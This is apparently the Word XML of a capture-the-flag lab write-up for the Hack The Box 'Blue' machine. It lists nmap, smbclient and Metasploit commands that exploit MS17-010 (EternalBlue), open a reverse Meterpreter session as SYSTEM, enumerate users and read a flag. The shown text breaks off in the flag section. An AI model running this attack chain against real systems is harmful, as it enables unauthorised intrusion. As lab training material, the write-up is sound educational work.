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6EE81" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source Code and Commands Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788BEA1" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB Exploitation – MS17-010 (EternalBlue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7405F263" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="00065B4B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="38D71B08">
          <v:rect id="_x0000_i1041" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2330C03F" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Project Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204BE32A" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>This document lists all tools, commands, and exploitation steps executed during the vulnerability assessment and exploitation of the SMB service on the target system (Hack The Box – Blue). The exploitation was performed in a controlled lab environment for educational and defensive security purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A569787" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="00065B4B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2F34CDE3">
          <v:rect id="_x0000_i1040" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FFE4A6" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Network Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F3562D" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap Service and OS Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DB3B9" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>nmap -sC -sV 10.129.2.41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D247C99" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>This command was used to identify open ports, running services, and the operating system of the target machine. The scan revealed SMB services running on port 445 and identified the operating system as Windows 7 Professional SP1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCCE2DC" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="00065B4B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="17CB37FD">
          <v:rect id="_x0000_i1039" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E27CD44" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB Vulnerability Detection (MS17-010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA7E25" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>nmap -p445 --script smb-vuln-ms17-010 10.129.2.41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6467C" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>This command checked whether the SMB service was vulnerable to the MS17-010 vulnerability. The result confirmed that the target system was vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448AABE2" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="00065B4B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6A2F9310">
          <v:rect id="_x0000_i1038" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0D6B8" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB Share Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A0D9D" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>nmap --script smb-enum-shares -p445 10.129.2.41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98FF6C" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>This command enumerated available SMB shares exposed by the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BC5B3" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="00065B4B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3E29C8D2">
          <v:rect id="_x0000_i1037" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C3A6C" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. SMB Enumeration Using smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA0544" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>smbclient -L //10.129.2.41 -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C38FF35" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>This command listed SMB shares using anonymous (guest) access without authentication, confirming exposed network resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A3779C" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6409EB5E">
          <v:rect id="_x0000_i1036" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37306FF8" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Exploitation Using Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58443DD5" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Launch Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D04EBD2" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D7B027" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>Starts the Metasploit Framework for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8DB257" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6B974F23">
          <v:rect id="_x0000_i1035" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF9C35" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load EternalBlue Exploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C18669C" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2541D7" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>Loads the MS17-010 EternalBlue exploit module targeting SMB vulnerabilities on Windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335BC6C6" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="26C3D153">
          <v:rect id="_x0000_i1034" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E56275" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configure Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FF1C1E" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>set RHOSTS 10.129.2.41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E656CF" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>Sets the target IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D079C" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="41422E4D">
          <v:rect id="_x0000_i1033" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739BF4C" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configure Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6C6EFF" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>set LHOST tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB02CE" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>Defines the local network interface for receiving the reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D76E53" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="22F70EF3">
          <v:rect id="_x0000_i1032" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B07005" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execute Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6520D" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A467537" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>Executes the exploit, resulting in a successful Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0BBD89" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="7B0544FC">
          <v:rect id="_x0000_i1031" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59730297" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C37422F" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verify Privilege Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2CB0E" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364CAF4" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCAB792" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F16070" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>Confirms SYSTEM-level privileges, representing full administrative access on the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420D8107" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1434670B">
          <v:rect id="_x0000_i1030" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BC94E" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Drop to Windows Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14066E0F" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8FC2E" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>Opens a native Windows command shell for post-exploitation activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF5C89" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3961CF43">
          <v:rect id="_x0000_i1029" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="467DB5DB" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB67457" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A0904" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3E8E">
        <w:br/>
        <w:t>Lists all local user accounts on the compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3158CF5F" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="78591501">
          <v:rect id="_x0000_i1028" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37183F29" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Flag Retrieval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383BE4F5" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB5568" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>cd C:\Users\haris\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F985EC8" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>type user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2378FCFE" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0C87B523">
